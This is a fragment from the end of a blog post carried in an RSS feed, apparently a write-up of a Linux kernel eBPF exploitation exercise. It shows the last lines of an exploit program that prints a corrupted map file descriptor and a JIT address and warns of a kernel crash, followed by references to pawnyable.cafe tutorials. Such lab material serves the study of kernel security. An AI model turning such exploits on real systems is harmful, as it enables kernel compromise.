  printf(&amp;#34;[+] mapfd: %d\n&amp;#34;, mapfd);
  printf(&amp;#34;[+] corrupted_map_fd: %d\n&amp;#34;, corrupted_map_fd);
  printf(&amp;#34;[+] jit_addr: 0x%016lx\n&amp;#34;, jit_addr);

  get_enter_to_continue(&amp;#34;Press enter to exit(cause kernel crash)...&amp;#34;);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h2 id=&#34;refernece&#34;&gt;Reference&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/ebpf.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/ebpf.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/verifier.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/verifier.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/exploit.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/exploit.html&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content>
    </item>
    
  </channel>
</rss>
